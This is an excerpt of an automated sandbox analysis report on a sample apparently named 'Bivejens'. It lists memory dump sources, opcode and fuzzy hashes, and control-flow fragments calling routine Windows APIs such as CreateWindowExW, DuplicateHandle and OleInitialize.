                                                                                                                          • Instruction ID: 07bd1f1ce1c04fb1062f000c89198b053a1ee320b3fa894d0a13dd2439c41a5b
                                                                                                                          • Opcode Fuzzy Hash: ddaf8087d9a1430f6736cf34bc3d47d8371fd22c759f3ad592715e488df12279
                                                                                                                          • Instruction Fuzzy Hash: FD81B574E00618DFDB14DFA9D894A9DBBF2BF89301F14C069E819AB361EB349985CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d466f2388eaa43847555355af7ef9bf20ee42deae6227dc7baff4f1bbf55a679
                                                                                                                          • Instruction ID: 906780bdb66406eb2740bbd11e9d01433e46f2501438bee896bddde7bec05391
                                                                                                                          • Opcode Fuzzy Hash: d466f2388eaa43847555355af7ef9bf20ee42deae6227dc7baff4f1bbf55a679
                                                                                                                          • Instruction Fuzzy Hash: A981B374E00218CFEB14DFAAD984B9DBBF2BF89304F14806AE859AB361DB345945CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8e4ae72a1bdc8537e6a0168457cbefe706baf2ac3b50405249308677a7330bed
                                                                                                                          • Instruction ID: 8b7cdb232fa7cfa4a4aa262603f9ace2eb648f469ffae91a8aaf9e21621f7dcb
                                                                                                                          • Opcode Fuzzy Hash: 8e4ae72a1bdc8537e6a0168457cbefe706baf2ac3b50405249308677a7330bed
                                                                                                                          • Instruction Fuzzy Hash: 7881B374E00218DFEB14DFAAD884A9DBBF2BF89301F24C069E819AB361DB745945CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7176823703957d03b89d53a6fdc5d49fa48a4ca2c9b7b4194c124d08e126bb90
                                                                                                                          • Instruction ID: a96d631b7f3fadfe73471691c90c1616062f5fd0c38c74afde0c2d3b6bf8e7aa
                                                                                                                          • Opcode Fuzzy Hash: 7176823703957d03b89d53a6fdc5d49fa48a4ca2c9b7b4194c124d08e126bb90
                                                                                                                          • Instruction Fuzzy Hash: 9181A574E00618CFEB14DFAAD884A9DBBF2BF89311F148069E819AB361DB749945CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fd7f994936c9a4e981f5902af21917e4f8b27165bef5f19444405b48df4a1110
                                                                                                                          • Instruction ID: 1df9a80acc30115166a96ab57801f6c2e67cf4aa247cb40d195c125fe17f60ba
                                                                                                                          • Opcode Fuzzy Hash: fd7f994936c9a4e981f5902af21917e4f8b27165bef5f19444405b48df4a1110
                                                                                                                          • Instruction Fuzzy Hash: D381A474E00218CFDB14DFAAD884A9DBBF2BF88311F14D069E819AB365DB745945CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4909ba3b3f87ae66baacbd63eae5c52d406d0f1c6af3639538fbf78b984cde21
                                                                                                                          • Instruction ID: 37f59f5f6d2e6debceabf7347a458fe32d8df42873b021415f056a03958e1999
                                                                                                                          • Opcode Fuzzy Hash: 4909ba3b3f87ae66baacbd63eae5c52d406d0f1c6af3639538fbf78b984cde21
                                                                                                                          • Instruction Fuzzy Hash: B951B574E00208DFDB18DFB6D884A9DBBF2BF89300F24806AE819AB365DB355945CF14
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 79bf9e241ccb32e513791b77c2281d587a5d940e092698110914bc4d83f32647
                                                                                                                          • Instruction ID: 1b7ae53b67399834a96caf43b09e053e9c93fd9d7d9ccfb617b13e808fbf699c
                                                                                                                          • Opcode Fuzzy Hash: 79bf9e241ccb32e513791b77c2281d587a5d940e092698110914bc4d83f32647
                                                                                                                          • Instruction Fuzzy Hash: 5251A674E00208DFEB18DFA6D494A9DBBF2BF89300F24812AE819AB365DB715945CF14
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e2142c10f7e977a498a4922d9d0d0a6e75d64cfa0b31b434e7b8d04923637b8a
                                                                                                                          • Instruction ID: dabdb801bf0562174733b5574b4d4e15ed79deb6be13cff05a706df574e8c471
                                                                                                                          • Opcode Fuzzy Hash: e2142c10f7e977a498a4922d9d0d0a6e75d64cfa0b31b434e7b8d04923637b8a
                                                                                                                          • Instruction Fuzzy Hash: C541D0B1D006188BEB18DFAAC8507DEBBF2BF89304F24C06AC418BB255DB754986CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 42a4807175081d42a6987a34adfd3a812c7247620c95686fbe11590ca9f61197
                                                                                                                          • Instruction ID: ed9a858b09827c4bcb550afaabe3087b57997afc4bdc86b06231d8e9942eb973
                                                                                                                          • Opcode Fuzzy Hash: 42a4807175081d42a6987a34adfd3a812c7247620c95686fbe11590ca9f61197
                                                                                                                          • Instruction Fuzzy Hash: 6441E270E006188FEB18DFAAD8546DEBBF2BF89300F20D16AC418AB254EB345946CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a572cfc12d009225a8b035722ef2561a56664393e77a1d6846d1401f30245b08
                                                                                                                          • Instruction ID: 03e624b563870727b45147114371859ce484fe360a5aa753845c54f9505c8ead
                                                                                                                          • Opcode Fuzzy Hash: a572cfc12d009225a8b035722ef2561a56664393e77a1d6846d1401f30245b08
                                                                                                                          • Instruction Fuzzy Hash: DC41C175E002188FEB18DFAAD954A9EBBF2BFC9300F10D16AD418BB254DB355946CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6a2425363261fd827d60b770b569f42874c8bef2c104bc79878e816e3cf3c0a2
                                                                                                                          • Instruction ID: fe59c7eba2fa426422951795eb91b523f493d28fdd8cfd042ba70026ea95b201
                                                                                                                          • Opcode Fuzzy Hash: 6a2425363261fd827d60b770b569f42874c8bef2c104bc79878e816e3cf3c0a2
                                                                                                                          • Instruction Fuzzy Hash: 4841E474D042188FDB18DFAAD8546DDBBF2BF89300F14C069D418BB254EB355946CF50

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 21B39776
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 21B397B3
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 21B397F0
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 21B39849
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617941470.0000000021B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 21B30000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21b30000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2063062207-0
                                                                                                                          • Opcode ID: fb444d8b686f4d2c159b943c69e29f5186aa7de460d4fa90ca74bd984fa210d9
                                                                                                                          • Instruction ID: 7e7bceb7b6e0d4f44e1eea4149cc25097446cb942248d18d1ec267f5b822ea59
                                                                                                                          • Opcode Fuzzy Hash: fb444d8b686f4d2c159b943c69e29f5186aa7de460d4fa90ca74bd984fa210d9
                                                                                                                          • Instruction Fuzzy Hash: E45146B1900349CFEB18CFA9D5847EEBBF1EF8D300F208519E819A7260C7745944CB66

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 21B39776
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 21B397B3
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 21B397F0
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 21B39849
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617941470.0000000021B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 21B30000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21b30000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2063062207-0
                                                                                                                          • Opcode ID: 14d7bf2ad6943bd54be21bac9c5b83ecf4bd23c539a6fad40e9d09096fe84ebb
                                                                                                                          • Instruction ID: 8e74fbacaea9e22af2fc184431716c0969d5572069425cd15648a8509d3c24a8
                                                                                                                          • Opcode Fuzzy Hash: 14d7bf2ad6943bd54be21bac9c5b83ecf4bd23c539a6fad40e9d09096fe84ebb
                                                                                                                          • Instruction Fuzzy Hash: 935135B1900349CFDB18CFAAD584BEEBBF1EF8D310F208119E819A7260D7746940CB65

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1528 21c21844-21c242f6 1530 21c24301-21c24308 1528->1530 1531 21c242f8-21c242fe 1528->1531 1532 21c24313-21c243b2 CreateWindowExW 1530->1532 1533 21c2430a-21c24310 1530->1533 1531->1530 1535 21c243b4-21c243ba 1532->1535 1536 21c243bb-21c243f3 1532->1536 1533->1532 1535->1536 1540 21c24400 1536->1540 1541 21c243f5-21c243f8 1536->1541 1542 21c24401 1540->1542 1541->1540 1542->1542
                                                                                                                          APIs
                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 21C243A2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2618025889.0000000021C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 21C20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21c20000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 716092398-0
                                                                                                                          • Opcode ID: 251e691c8702398bc73690f277372a21e7e1288b0c82226ee259173cd5f71740
                                                                                                                          • Instruction ID: 35477ee1770a2e0298f21bd6dbe4642da7297f4f6b72970af5e47146e682a4b3
                                                                                                                          • Opcode Fuzzy Hash: 251e691c8702398bc73690f277372a21e7e1288b0c82226ee259173cd5f71740
                                                                                                                          • Instruction Fuzzy Hash: 5751BEB5D00349DFDB14CF9AC884ADEBBB5FF49710F64812AE818AB210D775A885CF90

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1543 21c24284-21c242f6 1544 21c24301-21c24308 1543->1544 1545 21c242f8-21c242fe 1543->1545 1546 21c24313-21c2434b 1544->1546 1547 21c2430a-21c24310 1544->1547 1545->1544 1548 21c24353-21c243b2 CreateWindowExW 1546->1548 1547->1546 1549 21c243b4-21c243ba 1548->1549 1550 21c243bb-21c243f3 1548->1550 1549->1550 1554 21c24400 1550->1554 1555 21c243f5-21c243f8 1550->1555 1556 21c24401 1554->1556 1555->1554 1556->1556
                                                                                                                          APIs
                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 21C243A2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2618025889.0000000021C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 21C20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21c20000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 716092398-0
                                                                                                                          • Opcode ID: ae1eed825b913518b82ea0e9481f965f7a26849bb5c2fc1ccebc9189f093c191
                                                                                                                          • Instruction ID: c89e86c58303857f51a15e6cbf3ad76cb90741a3e06ca69cedd96672c88e1952
                                                                                                                          • Opcode Fuzzy Hash: ae1eed825b913518b82ea0e9481f965f7a26849bb5c2fc1ccebc9189f093c191
                                                                                                                          • Instruction Fuzzy Hash: E251C0B5D00348DFDB14CF9AC980ADEBBB5BF48310F64812AE818AB210D774A885CF90

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1557 21b39938-21b399d4 DuplicateHandle 1558 21b399d6-21b399dc 1557->1558 1559 21b399dd-21b399fa 1557->1559 1558->1559
                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 21B399C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617941470.0000000021B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 21B30000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21b30000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3793708945-0
                                                                                                                          • Opcode ID: ee507076c35ac6ab4f5bfaa605e7c237bc40ba9f094eafe637438f0e772f22f8
                                                                                                                          • Instruction ID: b0bb369ec0cd64397e751c5bab4be4801c5437a4cb33e987713f8923c01c225e
                                                                                                                          • Opcode Fuzzy Hash: ee507076c35ac6ab4f5bfaa605e7c237bc40ba9f094eafe637438f0e772f22f8
                                                                                                                          • Instruction Fuzzy Hash: F021E4B5900249DFDB10CFAAD580AEEBBF5EB48310F24841AE958A7310D379A954CFA0

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1562 21b39940-21b399d4 DuplicateHandle 1563 21b399d6-21b399dc 1562->1563 1564 21b399dd-21b399fa 1562->1564 1563->1564
                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 21B399C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617941470.0000000021B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 21B30000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21b30000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3793708945-0
                                                                                                                          • Opcode ID: 7d5e9f571358425cc5c745572cad040cd023c7b3902dd93d2ea639388c991f3a
                                                                                                                          • Instruction ID: a69f5a90e184a5cd59076d3c1ea409d78f09ecfead667f2d0432e8951ccea2fa
                                                                                                                          • Opcode Fuzzy Hash: 7d5e9f571358425cc5c745572cad040cd023c7b3902dd93d2ea639388c991f3a
                                                                                                                          • Instruction Fuzzy Hash: 7621C4B59003499FDB10CFAAD984ADEBBF8EB48310F14841AE954A7310D374A954CFA5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1567 21c26a12-21c26a17 1568 21c26a6a-21c26aa2 CallWindowProcW 1567->1568 1569 21c26a19-21c26a50 1567->1569 1570 21c26aa4-21c26aaa 1568->1570 1571 21c26aab-21c26aba 1568->1571 1575 21c26a52-21c26a58 1569->1575 1576 21c26a59-21c26a68 1569->1576 1570->1571 1572 21c26adf-21c26aec 1571->1572 1575->1576 1576->1572
                                                                                                                          APIs
                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 21C26A91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2618025889.0000000021C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 21C20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21c20000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallProcWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2714655100-0
                                                                                                                          • Opcode ID: 32d7be9a8f2d657a9893e23bb6c014b1f5433a45e10e318ae00ea85246fe7a0d
                                                                                                                          • Instruction ID: 83b769d153fe67d58eaa46ceee7e987ef87c2bc5a0f5497e73d852fc53050759
                                                                                                                          • Opcode Fuzzy Hash: 32d7be9a8f2d657a9893e23bb6c014b1f5433a45e10e318ae00ea85246fe7a0d
                                                                                                                          • Instruction Fuzzy Hash: EB215EB9900715CFDB14DF86C885B9BBBF5FB48314F24C549E5595B321C374A841CBA0

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1589 21c28f10-21c28f7a OleInitialize 1590 21c28f83-21c28fa0 1589->1590 1591 21c28f7c-21c28f82 1589->1591 1591->1590
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2618025889.0000000021C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 21C20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21c20000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Initialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2538663250-0
                                                                                                                          • Opcode ID: 072cc6b5d35709354d968938ccb07ec26482c547d4b4c4ea47240e43e14bf194
                                                                                                                          • Instruction ID: e9d4a6a6db420d56140fff5263526a7068b5a9e182efa764088e51f9b1769d59
                                                                                                                          • Opcode Fuzzy Hash: 072cc6b5d35709354d968938ccb07ec26482c547d4b4c4ea47240e43e14bf194
                                                                                                                          • Instruction Fuzzy Hash: 071115B5D00359CFDB20CF9AD444BDEBBF4EB48320F24855AD558A7610C374A984CFA5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1594 21c28f18-21c28f7a OleInitialize 1595 21c28f83-21c28fa0 1594->1595 1596 21c28f7c-21c28f82 1594->1596 1596->1595
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2618025889.0000000021C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 21C20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21c20000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Initialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2538663250-0
                                                                                                                          • Opcode ID: 3748178a0bafc909d6d8901ed0ed2ef64cafd01d55817c1bcbbdae0c15bb2d75
                                                                                                                          • Instruction ID: 497915c1aa6cec19a2e6cb39944b140e6a3dc28682e791627a7e1641f5a13956
                                                                                                                          • Opcode Fuzzy Hash: 3748178a0bafc909d6d8901ed0ed2ef64cafd01d55817c1bcbbdae0c15bb2d75
                                                                                                                          • Instruction Fuzzy Hash: 581123B5904348CFDB20DF9AD444BDEFBF4EB48320F248419D558A7210C378A940CFA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 38ebd7f45052b5bcb9dbd65db2949be582c97bc4b81d04704d920533d5554207
                                                                                                                          • Instruction ID: aec60ab5482f0bfd90470c0c914dd199376cff5b3624659565c4698bb0115662
                                                                                                                          • Opcode Fuzzy Hash: 38ebd7f45052b5bcb9dbd65db2949be582c97bc4b81d04704d920533d5554207
                                                                                                                          • Instruction Fuzzy Hash: D3129835065646CFA2502B70EDAC12BBBF1FB1F32B754ACA8F10FC58659B7144C9CA62
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 14215f76f5346c70d9872bd48c08ee0dcf9e629ef291af00c0f81f55ec272b47
                                                                                                                          • Instruction ID: 8909c500c138ddf4859031f3ba1414a1ba2f36e2b5c274442133b93d126127f9
                                                                                                                          • Opcode Fuzzy Hash: 14215f76f5346c70d9872bd48c08ee0dcf9e629ef291af00c0f81f55ec272b47
                                                                                                                          • Instruction Fuzzy Hash: 25129835065646CFA2502B70EDAC12BBBF1FB1F32B754ACA8F10FC58659B7144C9CA62
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c95325267feb398b0daa4531f685b262515c68de82eae83c9c14f843bbd805eb
                                                                                                                          • Instruction ID: bfa46eca2376eaf2c3b506573d6312b5d51dc528acc4069d0d0f20d37f294130
                                                                                                                          • Opcode Fuzzy Hash: c95325267feb398b0daa4531f685b262515c68de82eae83c9c14f843bbd805eb
                                                                                                                          • Instruction Fuzzy Hash: D952D274900229CFDB54DF24DD95B89BBB6BB49311F1081E9D88EA7361DB312E85CF90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a8de690d15c49dfb901dfacbeae84b11eb3ab1ea5584bb4b324403e272eac6ea
                                                                                                                          • Instruction ID: 3b6bf5548de2fc23f1cab9b160e95462274938602b1870afaeb881a68ba7474d
                                                                                                                          • Opcode Fuzzy Hash: a8de690d15c49dfb901dfacbeae84b11eb3ab1ea5584bb4b324403e272eac6ea
                                                                                                                          • Instruction Fuzzy Hash: 1AE17E30A04209CFCB15CF68E885AADBBF1FF49315F158599E8699F2A1C731ED85CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 36cbd32bce0f6a57ea999866d30803265e100bb73e21457699f34e344b32ec46
                                                                                                                          • Instruction ID: a12ab38a733419296a25953268a3ec28c400b3238d54ee05d3157eb239a52124
                                                                                                                          • Opcode Fuzzy Hash: 36cbd32bce0f6a57ea999866d30803265e100bb73e21457699f34e344b32ec46
                                                                                                                          • Instruction Fuzzy Hash: 2561C030704210CFDB189B75889473A7AA6AFC8352F544569E866CF3A2DF74CC8AD7D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 698011a878ac2b1b5aea72d4984353b83249e56ee0abed842e488260901e0c1b
                                                                                                                          • Instruction ID: 49257554007f7ba0765a9a15a96fb4cb339413772276c2cf724f975ce6385ef5
                                                                                                                          • Opcode Fuzzy Hash: 698011a878ac2b1b5aea72d4984353b83249e56ee0abed842e488260901e0c1b
                                                                                                                          • Instruction Fuzzy Hash: C4818C74E04248CFCB05DFB9D8949DDBBB2FF89311B2480A9D819AB361DB359846CF51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2ebadb8710a73fec509bb609e4afbd0988a34c3895c3885e19d69e871739bd52
                                                                                                                          • Instruction ID: 5eb680b060c774e3213094caa07164f1aee408e8ed6f1a915151a6b1da7eaf84
                                                                                                                          • Opcode Fuzzy Hash: 2ebadb8710a73fec509bb609e4afbd0988a34c3895c3885e19d69e871739bd52
                                                                                                                          • Instruction Fuzzy Hash: E9719074A00505CFCB58CF68C4849A9BBB2BF89302BA58169D825EF365DB31EC49CF91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 65de480b73f191b5a6624cc395705c70a352c7375770ce12435304b16a0e31b0
                                                                                                                          • Instruction ID: 3de99f5e4d2a88b14b777688785d65df4d802a5c5ac90f8618c653624b03499c
                                                                                                                          • Opcode Fuzzy Hash: 65de480b73f191b5a6624cc395705c70a352c7375770ce12435304b16a0e31b0
                                                                                                                          • Instruction Fuzzy Hash: AA71F534700A05CFCB15DF68C884A6A7BE6AF99342F1540A9E826EF371DB70DC86CB50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
